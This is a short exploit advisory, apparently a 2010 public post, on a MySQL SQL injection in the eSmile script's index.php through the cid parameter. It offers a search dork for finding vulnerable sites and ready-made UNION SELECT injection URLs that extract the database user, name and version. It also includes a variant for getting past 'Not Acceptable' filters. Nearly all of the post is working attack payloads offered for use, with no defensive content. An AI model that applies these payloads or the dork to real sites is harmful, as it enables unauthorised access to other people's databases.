1 eSmile (index.php) Sql Injection Vulnerability
2 ==============================================================
3
4 ####################################################################
5 .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
6 .:. Team : Sec Attack Team
7 .:. Home : www.sec−attack.com/vb
8 .:. Script : eSmile
9 .:. Bug Type : Sql Injection[Mysql]
10 .:. Dork : "Powered by: eSmile"
11
12 ####################################################################
13
14 ===[ Exploit ]===
15
16 www.site.com/index.php?do=show&cid=null[Sql Injection]
17
18 www.site.com/index.php?do=show&cid=null’/**/and/**/1=2/**/union/**/select/**/111,222,333,444,555,CONCAT_WS(CHAR(32,58
,32),user(),database(),version())−− −
19 www.site.com/index.php?do=show&cid=null’/**/and/**/1=2/**/union/**/select/**/111,222,333,444,CONCAT_WS(CHAR(32,58,32)
,user(),database(),version()),666−− −
20
21 T0 Bypass Not Acceptable
22
23
24 www.site.com/index.php?do=show&cid=−NULL’/**/UNION/**/ALL/**/SELECT/**/111,222,333,444,555,CONCAT_WS(CHAR(32,58,32),u
ser(),database(),version())−− −
25
Page 1/1
eSmile Script index.php SQL Injection Vulnerability
AtT4CKxT3rR0r1ST
02/10/2010